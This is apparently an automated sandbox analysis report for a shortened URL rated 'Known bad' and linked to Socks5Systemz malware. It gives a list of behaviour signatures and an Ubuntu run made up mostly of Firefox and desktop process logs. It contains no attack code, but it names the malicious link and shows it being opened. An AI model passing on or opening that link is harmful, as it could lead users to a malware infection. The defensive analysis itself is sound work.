Analysis Overview
Threat Level: Known bad
The file https://ify.ac/1IZk was found to be: Known bad.
Malicious Activity Summary
Socks5Systemz
Detect Socks5Systemz Payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of web browsers
Checks computer location settings
Unexpected DNS network traffic destination
Executes dropped EXE
Checks BIOS information in registry
Adds Run key to start application
Checks installed software on the system
Drops Chrome extension
Drops desktop.ini file(s)
Enumerates connected drives
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Checks CPU configuration
Changes its process name
Reads CPU attributes
Writes file to tmp directory
Enumerates kernel/hardware configuration
Program crash
Reads runtime system information
Enumerates physical storage devices
NSIS installer
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Modifies Control Panel
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks CPU information
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Enumerates system info in registry
Scheduled Task/Job: Scheduled Task
Checks memory information
Checks SCSI registry key(s)
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
NTFS ADS
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Mobile Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-16 05:11
Signatures
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:20
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
569s
Max time network
568s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | gmain | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gdbus | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | glean.dispatche | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | HTML5 Parser | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | HTML5 Parser | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Backgro~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Backgro~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPDL Background | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-firefox | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPDL Background | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-firefox | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Socket Thread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Socket Thread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Netlink Monitor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Netlink Monitor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | JS Watchdog | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | JS Watchdog | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Timer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Timer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BGReadURLs | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BGReadURLs | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | glxtest:disk$0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cache2 I/O | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cookie | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cookie | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | StreamTrans #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | StreamTrans #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | TaskCon~ller #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | TaskCon~ller #0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Worker Launcher | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Worker Launcher | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | CanvasRenderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | CanvasRenderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Compositor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Compositor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorkerLP#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorkerLP#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorker#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorker#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Renderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Renderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | ImageIO | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | ImageIO | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Permission | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Permission | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC Launch | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC Launch | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | SandboxReporter | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | SandboxReporter | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Breakpad Server | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Sandbox Forked | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gmain | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gdbus | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Chroot Helper | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-/usr/libex | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gmain | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/lib/firefox/firefox | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/nautilus | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/size | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/size | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/dbus/mask | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/uevent | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/usb/devices | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/uevent | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/bus/usb/devices | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/uevent | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/class | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/uevent | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/class | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cmdline | /usr/libexec/dconf-service | N/A |
| File opened for reading | /proc/self/mountinfo | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1787/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1592/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/sys/kernel/cap_last_cap | /usr/bin/gnome-keyring-daemon | N/A |
| File opened for reading | /proc/self/fd/36 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/task/1580/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gnome-keyring-daemon | N/A |
| File opened for reading | /proc/1596/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/mountinfo | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/123 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/goa-identity-service | N/A |
| File opened for reading | /proc/mounts | /usr/libexec/xdg-desktop-portal | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/nautilus | N/A |
| File opened for reading | /proc/meminfo | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1780/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/cgroup | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/133 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1763/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/32 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1602/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/task/1877/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/90 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1/cgroup | /usr/libexec/gvfs-udisks2-volume-monitor | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/goa-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/sys/kernel/cap_last_cap | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/131 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/134 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/77 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/87 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/task/1717/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/task/1690/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/126 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1571/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/58 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/125 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1755/status | /usr/bin/gnome-keyring-daemon | N/A |
| File opened for reading | /proc/1763/cgroup | /usr/libexec/gvfs-udisks2-volume-monitor | N/A |
| File opened for reading | /proc/1398/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1629/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/57 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1769/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1775/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/71 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/mountinfo | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/xdg-desktop-portal | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/85 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/xdg-document-portal | N/A |
| File opened for reading | /proc/self/fd/129 | /usr/lib/firefox/firefox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/firefox/.parentlock | /usr/lib/firefox/firefox | N/A |
| File opened for modification | /tmp/tmpaddon | /usr/lib/firefox/firefox | N/A |
Processes
/usr/bin/xdg-open
[xdg-open https://ify.ac/1IZk]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/dbus-daemon
[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/grep
[grep -q ^file://]
/usr/bin/egrep
[egrep -q ^[[:alpha:]+\.\-]+:]
/usr/local/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/local/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/sed
[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/https]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/which
[which firefox]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/firefox
[/usr/bin/firefox https://ify.ac/1IZk]
/usr/bin/which
[which /usr/bin/firefox]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox https://ify.ac/1IZk]
/usr/local/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/local/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/lib/firefox/glxtest
[/usr/lib/firefox/glxtest -f 13]
/usr/bin/lsb_release
[/usr/bin/lsb_release -idrc]
/usr/local/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/local/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/libexec/xdg-desktop-portal
[/usr/libexec/xdg-desktop-portal]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -prefsLen 20597 -prefMapSize 234708 -appDir /usr/lib/firefox/browser {0463b05e-2e91-45a4-949c-c2928f636b17} 1527 true socket]
/usr/libexec/xdg-document-portal
[/usr/libexec/xdg-document-portal]
/usr/libexec/xdg-permission-store
[/usr/libexec/xdg-permission-store]
/usr/libexec/xdg-desktop-portal-gtk
[/usr/libexec/xdg-desktop-portal-gtk]
/usr/libexec/gvfsd
[/usr/libexec/gvfsd]
/usr/libexec/gvfsd-fuse
[/usr/libexec/gvfsd-fuse /root/.cache/gvfs -f -o big_writes]
/usr/libexec/dconf-service
[/usr/libexec/dconf-service]
/usr/bin/nautilus
[/usr/bin/nautilus --gapplication-service]
/usr/libexec/gvfsd-trash
[/usr/libexec/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 20271 -prefMapSize 234708 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {ab9138ae-7caa-47d0-92e2-f4f0485bfb68} 1527 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 26979 -prefMapSize 234708 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {afad85a7-fcf2-4335-9ad8-9ee68613dffb} 1527 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 25639 -prefMapSize 234708 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {ff6f9b2c-f3f3-4f07-8414-c36e07c0dd3e} 1527 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -sandboxingKind 0 -prefsLen 27670 -prefMapSize 234708 -appDir /usr/lib/firefox/browser {898de229-84bf-4386-abce-1db535c97d78} 1527 true utility]
/usr/bin/gnome-keyring-daemon
[/usr/bin/gnome-keyring-daemon --start --foreground --components=secrets]
/usr/libexec/gvfs-udisks2-volume-monitor
[/usr/libexec/gvfs-udisks2-volume-monitor]
/usr/libexec/gvfs-afc-volume-monitor
[/usr/libexec/gvfs-afc-volume-monitor]
/usr/libexec/gvfs-mtp-volume-monitor
[/usr/libexec/gvfs-mtp-volume-monitor]
/usr/libexec/gvfs-gphoto2-volume-monitor
[/usr/libexec/gvfs-gphoto2-volume-monitor]
/usr/libexec/gvfs-goa-volume-monitor
[/usr/libexec/gvfs-goa-volume-monitor]
/usr/libexec/goa-daemon
[/usr/libexec/goa-daemon]
/usr/libexec/goa-identity-service
[/usr/libexec/goa-identity-service]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 4 -isForBrowser -prefsLen 29048 -prefMapSize 234708 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {efd295fd-808b-49e9-b343-53aedd8c2786} 1527 true tab]
/usr/bin/speech-dispatcher
[/usr/bin/speech-dispatcher --spawn --communication-method unix_socket --socket-path /root/.cache/speech-dispatcher/speechd.sock]
/bin/sh
[sh -c type espeak > /dev/null 2>&1]
/bin/sh
[sh -c type mbrola > /dev/null 2>&1]
/bin/sh
[sh -c type espeak > /dev/null 2>&1]
/bin/sh
[sh -c type espeak-ng > /dev/null 2>&1]
/bin/sh
[sh -c type mbrola > /dev/null 2>&1]
/bin/sh
[sh -c type curl > /dev/null 2>&1]
/bin/sh
[sh -c type epos-say > /dev/null 2>&1]
/bin/sh
[sh -c type say > /dev/null 2>&1]
/bin/sh
[sh -c type pico2wave > /dev/null 2>&1]
/bin/sh
[sh -c type llia_phon > /dev/null 2>&1]
/bin/sh
[sh -c type mbrola > /dev/null 2>&1]
/bin/sh
[sh -c type /opt/swift/bin/swift > /dev/null 2>&1]
/usr/lib/speech-dispatcher-modules/sd_espeak-ng
